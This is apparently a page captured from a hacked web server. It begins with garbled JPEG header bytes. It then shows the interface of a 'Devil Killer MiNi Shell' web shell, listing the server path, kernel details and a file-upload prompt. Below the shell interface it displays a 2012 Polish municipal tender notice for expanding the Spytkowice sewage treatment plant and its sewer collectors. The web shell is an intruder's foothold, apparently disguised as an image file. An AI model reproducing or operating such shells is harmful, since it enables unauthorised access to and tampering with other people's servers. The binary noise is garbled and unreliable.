JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120326/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120326/93750-N-2012.html

<p class="kh_header"><b>Spytkowice: Rozbudowę oczyszczalni ścieków w Spytkowicach- etap I wraz z budową kanalizacji sanitarnej (kolektory A,B,C,D)</b><br>
<b>Numer ogłoszenia: 93750 - 2012; data zamieszczenia: 26.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Spytkowice , Spytkowice 26, 34-745 Spytkowice, woj. małopolskie, tel. 018 2688370, faks 018 2688961.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spytkowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowę oczyszczalni ścieków w Spytkowicach- etap I wraz z budową kanalizacji sanitarnej (kolektory A,B,C,D).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Budowa kanalizacji sanitarnej w Spytkowicach kolektory A,B,C,D
CHARAKTERYSTYKA OBIEKTU
Przedmiar robót obejmuje zakres robót związany z Budową kanalizacji sanitarnej w Spytkowicach
kolektory A, B, C, D
Kolektor A :
Łączna długość kanału PVC SN8 lite śr 200 : L = 260.90mb
PVC SN 8 lite śr 160 : L = 10.30 mb
Kolektor B
Długość kanału PVC SN8 lite O 200 : L = 336.40 mb
PVC SN8 lite śr 160 : L = 26.40 mb
Kolektor B-1
Długość kanału PVC SN8 lite śr 200: L = 77.60 mb
Sięgacz ST6-ST6.1
Długość kanału PVC SN8 lite śr160: L= 7.80 mb
Razem kolektor B:
Łączna długość kanału PVC SN8 lite śr 200 : L = 414.00 mb
PVC SN8 lite śr 160 : L = 34.20 mb
Kolektor C
Długość kanału PVC SN8 lite śr 200: L = 335.60 mb
Kolektor C-1
Długość kanału PVC SN8 lite śr 200 : L = 188.00 mb
PVC SN8 lite śr 160 : L= 9.80 mb
Kolektor C-2
Długość kanału PVC SN8 lite śr 160 : L = 52.50 mb
Sięgacze do kol. C
Długość kanału PVC SN8 lite śr 160 : L = 105.40mb
Razem kolektor C :
Łączna długość kanału PVC SN8 lite śr 200: L = 523.60mb
PVC SN8 lite śr 160 : L = 167.70 mb
Kolektor D
Długość kanału PVC SN8 lite śr 200: L = 458,70mb
Długość kanału PE śr 200przewiert sterowany L= 95.0 mb
Długość kanału PVC SN8 lite śr 160 : L= 12.40 mb
Kolektor D- 1
Długość kanału PVC SN8 lite śr 200 : L = 203.6 mb
Kolektor D- 2
Długość kanału PVC SN8 lite śr 200 : L = 30.00mb
PVC SN8 lite śr 160 : L = 31.10 mb
Sięgacze do kol. D
Długość kanału PVC SN8 lite śr 200 : L = 27.20mb
PVC SN8 lite śr 160 : L= 104.20mb
Razem kolektor D :
Długość kanału PVC SN8 lite śr 200 : L = 719.50mb
Długość kanału PE śr 200 przewiert sterowany L= 95.0 mb
PVC SN8 lite śr 160 : L = 147.70mb
Ogółem łączna długość kanalizacji kolektory A, B, C, D:
śr 200 : L = 2 013.00mb
śr 160 : L = 359.90mb
Roboty prowadzone będą w wykopach otwartych wąsko-przestrzennych, zabezpieczonych szalunkami.
Przekroczenia pod drogami gminnymi asfaltowymi przewiertem, przepychem w rurze stalowej osłonowej śr 273przez10.7mm, śr 219przez8.5mm.
2.	Rozbudowa oczyszczalni ścieków

Przedmiotem opracowania jest rozbudowa oczyszczalni ścieków wraz z infrastrukturą
techniczną w miejscowości Spytkowice na działce nr ewid. 1842przez15 gm. Spytkowice, powiat
nowotarski, województwo małopolskie.
Istniejąca oczyszczalnia ścieków w miejscowości Spytkowice, w technologii SBR
typu BIOVAC zostanie rozbudowana w dwóch etapach do łącznej wydajności z częścią
istniejącą Qdśr=800m3 na d, z możliwością dalszej rozbudowy do wydajności docelowej
Qdśr=990m3 na d.
Zgodnie z ustaleniami z Gminą Spytkowice etapowanie rozbudowy oczyszczalni
ścieków obejmować będzie zakres:
- ETAP I zakłada rozbudowę oczyszczalni ścieków do łącznej wydajności z częścią
istniejącą Qdśr=550m3d,
Opracowanie jest projektem budowlanym, architektonicznym. Przedmiotem
opracowania jest projekt zagospodarowania działki w zakresie rozbudowy oczyszczalni
ścieków w miejscowości Spytkowice w pow. nowotarskim. Zakres opracowania obejmuje
teren działki o nr ewid. 1842przez15, przeznaczonej w planie zagospodarowania przestrzennego
pod obiekty oczyszczalni ścieków. Projekt rozbudowy przewiduje przebudowę istniejącego
ogrodzenia oczyszczalni ścieków na działce o nr ewid. 1842przez15, tj. przesunięcie istniejącego
ogrodzenia terenu oczyszczalni ścieków w kierunku południowym i zwiększenie powierzchni
terenu w granicach ogrodzenia o ca 0,127 ha. Powierzchnia terenu oczyszczalni ścieków po
rozbudowie, w granicach ogrodzenia wynosić będzie 0,324 ha.
1.1. Dane ogólne o projektowanych budynkach:
1 projektowany budynek - HALA REAKTORÓW NR 2 oznaczony numerem 13 na mapie w
projekcie zagospodarowania terenu:
długość hali reaktorów nr 2 - 26,86 m
szerokość hali reaktorów nr 2 - 13,83 m
wysokość w kalenicy hali reaktorów nr 2 - 6,76m
pow. zabudowy hali reaktorów nr 2 - 335,31 m2
pow. użytkowa hali reaktorów nr 2 (etap I) - 113,39 m2
pow. użytkowa hali reaktorów nr 2 (etap II) - 133,50 m2
kubatura hali reaktorów nr 2 (bez reaktorów) (etap I) - 717,22 m3
kubatura hali reaktorów nr 2 (bez reaktorów) (etap II) - 877,87 m3
rzędna zera hali reaktorów nr 2 - 487,80 m n p m
2 projektowana wiata - STANOWISKO ODBIORU OSADU POD WIATĄ oznaczony
numerem 16 na mapie w projekcie zagospodarowania terenu:
długość wiaty - 18,36 m
szerokość wiaty - 6,70 m
wysokość w kalenicy wiaty ~ 6,76m
pow. zabudowy wiaty - 123,01 m2
pow. użytkowa wiaty - 111,31 m2
kubatura wiaty - 649,40 m3
rzędna zera wiaty - 487,80 m n p m
3projektowany budynek - ISTNIEJĄCY BUDYNEK TECHNICZNY
długość (bez zmian) - 6,71 m
szerokość (bez zmian) - 4,25 m
wysokość y (bez zmian) około 3,70m
pow. zabudowy (bez zmian) - 28,21 m2
pow. użytkowa (bez zmian) - 25,00 m2
kubatura (bez zmian) - 93,40 m3
rzędna zera - 487,40 m n p m
Powierzchnia działki - 5886,00m2
Powierzchnia działki w zakresie opracowania - 3240,00m2.
Budynek agregatu nie będzie wykonywany w tym etapie.
Rozbudowa istniejącej oczyszczalni ścieków dla potrzeb ETAPU I-ego obejmuje swym
zakresem:
- OBIEKTY ISTNIEJĄCE do przebudowy:
1. Pompownia ścieków z komorą armatury - przebudowa pompowni ścieków
obejmować będzie zwiększenie wydajności obiektu. Zakres przebudowy będzie
obejmował:
- demontaż istniejących pomp zatapialnych, czyszczenie zbiornika
pompowni
- demontaż armatury i wyburzenie komory armatury
- montaż nowych pomp zatapialnych do ścieków oraz wykonanie nowej
komory z montaSem nowej armatury o średnicy DN150mm.
2. Budynek technologiczny - zakres projektu obejmuje adaptację istniejącego
pomieszczenia technologicznego dla potrzeb montażu nowego układu
technologicznego do mechanicznego oczyszczania ścieków i odwadniania osadów.
Zakres robót obejmuje:
- w branży budowlanej - w ramach przebudowy istniejącego pomieszczenia
technologicznego budynku zostaną wydzielone nowe pomieszczenia
technologiczne, odrębne dla części mechanicznej (pomieszczenie
sitopiaskownika) i odwadniania osadu (pomieszczenie odwadniania osadu),
- w branży technologicznej - demontaS istniejących urządzeń: krat
workowych, instalacji odwadniania piasku, urządzenia Draimad i
przygotowania polielektrolitu oraz montaż nowych urządzeń do
mechanicznego oczyszczania ścieków (sito zintegrowanego z
piaskownikiem napowietrzanym, awaryjna krata ręczna), stacji zlewczej
ścieków dowożonych z prasą do skratek oraz urządzeń do mechanicznego
odwadniania osadów ściekowych (prasa taśmowa, zespół przygotowania i
dozowania polielektrolitu, higienizacja osadu, zespół odzysku wody
płuczącej, pompa osadowa),
- w branżach instalacyjnych - przebudowa istniejącej instalacji wod.-kan.,
ogrzewania i wentylacji oraz przebudowa i wykonanie nowych podłączeń
elektrycznych.
3. Komora rozdziału ścieków - projekt zakłada zmianę funkcji technologicznej
istniejącego piaskownika na komorę rozdziału ścieków. Ścieki z komory będą
kierowane do części istniejącej i części projektowanej biologicznej oczyszczalni
ścieków, tj. nastąpi rozdział dopływu ścieków po sitopiaskowniku do istniejącego
zbiornika retencyjnego ścieków nr 1 oraz do projektowanego zbiornika retencyjnego
ścieków nr 2. Zakres projektu obejmuje roboty adaptacyjne w branży budowlanej i
technologicznej (montaż zastawek kanałowych).
4. Budynek techniczny - zakres przebudowy obejmuje roboty budowlane i instalacyjne
w zakresie adaptacji istniejącego obudowanego składowiska osadu dla potrzeb
obsługi oczyszczalni.
- OBIEKTY ISTNIEJĄCE bez zmian istotnych:
5. Zbiornik retencyjny ścieków nr 1 - zakres projektu w branży technologicznej
obejmuje wykonanie nowego włączenia rurociągu technologicznego dopływu
ścieków z komory rozdziału ścieków.
6. Hala reaktorów nr 1
7. Reaktory SBR - V=70m3 (kpl. 4)
Zakres projektu obejmuje:
- w branży technologicznej wymianę istniejących rusztów napowietrzających
reaktorów SBR na nowe oraz wymianę istniejących dmuchaw do
napowietrzania reaktorów SBR na dmuchawy nowe, montowanych jak
uprzednio w hali reaktorów nr 1 oraz montaż zaworu odcinającego DN100mm
na rurociągu dopływu osadu do pompy poziomej osadu z SBR.
- w branży budowlanej pokrycie ścian płytkami ceramicznymi do wysokości
2,05m powyżej posadzki przy stanowisku pompy poziomej osadu z SBR oraz
ścian wnęk reaktorów SBR przy zaworach odpływowych.
8. Reaktor STO - V=70m3 (kpl. 1) - zakres projektu obejmuje wymianę istniejącego
rusztu napowietrzającego reaktora STO na nowy oraz wymianę istniejącej
dmuchawy do napowietrzania reaktora STO na dmuchawę nową, montowaną jak
uprzednio w budynku technologicznym, w pomieszczeniu odwadniania osadu.
9. Zbiornik koagulantu PIX - zakres projektu obejmuje w branży budowlanej
wykonanie nowej wykładziny kwasoodpornej w wannie pod zbiornikiem.
10. Stanowisko agregatu prądotwórczego awaryjne - obiekt istniejący bez zmian,
projekt zakłada pozostawienie agregatu istniejącego jako obiektu awaryjnego.
11. Wylot ścieków do odbiornika - obiekt istniejący bez zmian.
- OBIEKTY PROJEKTOWANE nowe:
12. Zbiorniki retencyjny ścieków nr 2 i nr 3 - zbiorniki podziemne poziome z tworzyw
sztucznych, posadowione częściowo pod stanowiskiem odbioru osadu pod wiatą,
połączone hydraulicznie górą z istniejącym zbiornikiem retencyjnym nr 1.
13. Hala reaktorów nr 2 - budynek jednokondygnacyjny o konstrukcji tradycyjnej, z
wydzielonymi następującymi pomieszczeniami: pomieszczenie reaktorów SBR,
pomieszczenie dmuchaw, pomieszczenie sterowni.
14. Reaktory SBR - V=115m3 (kpl. 2) - zbiorniki pionowe naziemne z tworzyw
sztucznych, izolowane termicznie, częściowo umieszczone w pomieszczeniu
reaktorów nr 2.
15. Reaktory STO - V=115m3 (kpl. 2) - zbiorniki pionowe naziemne z tworzyw
sztucznych, izolowane termicznie, montowane na zewnątrz przy budynku hali
reaktorów nr 2, połączone wnękami z pomieszczeniem dmuchaw.
16. Stanowisko odbioru osadu pod wiatą - plac utwardzony z zadaszeniem i
częściową obudową, z odwodnieniem liniowym włączonym do zbiornika
retencyjnego ścieków nr 2.
17. Zasobnik wapna do higienizacji osadu - zbiornik pionowy naziemny stalowy,
montowany na zewnątrz przy budynku technologicznym, w miejscu wydzielonym
na stanowisku odbioru osadu pod wiatą.
18. Stacja transformatorowa słupowa
- OBIEKTY ISTNIEJĄCE do wyburzenia:
19. Punkt zlewny ścieków dowożonych.
Rozbudowa oczyszczalni ścieków w ETAPIE II-gim będzie obejmować swym
zakresem doposażenie części biologicznej oczyszczalni, tj. będzie obejmować montaż 2
dodatkowych reaktorów SBR o pojemności 115m3 oraz rozbudowę budynku hali reaktorów
nr 2.
Szczegółowy opis przedmiotu zamówienia zawiera dokumentacja projektowa, przedmiar robót i specyfikacja techniczna wykonania i odbioru robót. Dokumentacja ta jest załącznikiem do ogłoszenia o przetargu i jest dostępna na stronie internetowej zamawiającego. W przypadku, gdyby Wykonawca nie posiadał dostępu do internetu,  musi to zgłosić zamawiającemu. W takiej sytuacji  powyższa  dokumentacja będzie udostępniana (wypożyczana) Wykonawcom w celu sporządzenia oferty..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 45.23.24.21-9, 45.23.24.23-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający przewiduje wniesienie wadium w wysokości 100 000,- zł (słownie złotych: sto tysięcy).
 Wadium może być wnoszone w pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej (z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym),gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn.: Dz. U. z 2007 r. Nr 42, poz. 275 z pózn. zm.).
 Wadium wnoszone w pieniądzu należy wpłacić na rachunek bankowy Zamawiającego: Bank Spółdzielczy w Rabie Wyżnej nr rach.: 35 88 150002 0000 0000 9364 0017
Za datę wniesienia wadium w pieniądzu uznaje sie datę wpływu pieniędzy na rachunek
bankowy Zamawiającego.
. Pozostałe formy wadium wymienione w pkt. 10.2. wymagają złożenia odpowiednich dokumentów w Kasie Urzędu Gminy Spytkowice, 34-745 Spytkowice 26 do dnia 11.04.2012 r. do godz. 10.00.
 Wadium wniesione w formie poręczeń lub gwarancji musi zawierać zobowiązanie gwaranta lub poręczyciela do bezwarunkowej zapłaty Zamawiającemu pełnej kwoty wadium na każde jego żądanie w terminie związania ofertą w przypadkach określonych w art. 46 ust. 5 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien wykazać, że wykonał w okresie ostatnich 5 lat przed upływem terminu
składania ofert, a jeżeli okres prowadzonej działalności jest krótszy - w tym okresie, co najmniej :
- jedną robotę budowlaną polegającą na budowie lub rozbudowie oczyszczalni ścieków o wydajności minimum 400m3/d
- dwie roboty budowlane polegające na budowie lub rozbudowie wodno- kanalizacyjnego lub kanalizacyjnego o łącznej długości minimum5 km
W przypadku Wykonawców wspólnie ubiegających sie o udzielenie zamówienia, powyższy warunek mogą spełniać Wykonawcy łącznie.
Ocena spełniania warunku zostanie dokonana wg formuły: spełnia- nie spełnia, na podstawie złożonego przez Wykonawcę:
- oświadczenia o spełnianiu warunków udziału w postępowaniu,
- wykazu wykonanych robót,
- dokumentów potwierdzających, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania niniejszego warunku Wykonawca zobowiązany jest wskazać osoby, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności:
Kierownik Budowy i Kierownicy Robót:
1.	Kierownik Budowy- kwalifikacje i umiejętności: uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych lub uprawnienia równoważne do powyższych, a wydane na podstawie wcześniej obowiązujących przepisów prawa, w zakresie dostosowanym do przedmiotu zamówienia oraz przynależność do Okręgowej Izby Inżynierów Budownictwa.
2.	Kierownik Robót Konstrukcyjno- Budowlanych- kwalifikacje i umiejętności: uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno- budowlanej lub uprawnienia równoważne do powyższych, a wydane na podstawie wcześniej obowiązujących przepisów prawa oraz przynależność do Okręgowej Izby Inżynierów Budownictwa 
3.	Kierownik Robót Elektrycznych- kwalifikacje i umiejętności: uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub uprawnienia równoważne do powyższych, a wydane na podstawie wcześniej obowiązujących przepisów prawa oraz przynależność do Okręgowej Izby Inżynierów Budownictwa
Zamawiający dopuszcza łączenie funkcji przez wskazane osoby, które będą wykonywać niniejsze zamówienie pod warunkiem, że osoba ta spełnia łącznie wymagania dla każdej z łączonych funkcji, z wyjątkiem przypadków określonych w Prawie budowlanym.
W przypadku Wykonawców zagranicznych, dopuszcza się równoważne kwalifikacje zdobyte w innych państwach, na zasadach określonych w art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane, z uwzględnieniem postanowień ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2008 r. Nr 63, poz. 394 z późn. zm.)
Ocena spełniania warunku zostanie dokonana wg formuły: spełni- nie spełnia, na podstawie złożonego przez Wykonawcę:
- oświadczenia o spełnianiu warunków udziału w postępowaniu, 
- wykazu osób które będą uczestniczyły w wykonaniu zamówienia,
- oświadczenie Wykonawcy że osoby które będą wykonywać zamówienia posiadają wymagane uprawnienia
W przypadku Wykonawców wspólnie ubiegających sie o udzielenie zamówienia, powyższy warunek mogą spełniać Wykonawcy łącznie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien wykazać, że jest ubezpieczony od odpowiedzialności cywilnej za szkody rzeczowe i osobowe wyrządzone osobie trzeciej w zakresie prowadzonej działalności gospodarczej na terenie Rzeczypospolitej Polskiej.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, powyższy warunek powinien spełniać każdy Wykonawca.
Zamawiający uzna warunek za spełniony jeśli Wykonawca wykaże posiadanie środków finansowych lub posiadanie zdolności kredytowej w wysokości co najmniej 1.000.000,00 zł 
Ocena spełniania warunku zostanie dokonana wg formuły: spełnia- nie spełnia, na podstawie złożonego przez Wykonawcę:
- oświadczenia o spełnianiu warunków udziału w postępowaniu, 
- informację banku lub spółdzielczej kasy oszczędnościowo- kredytowej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

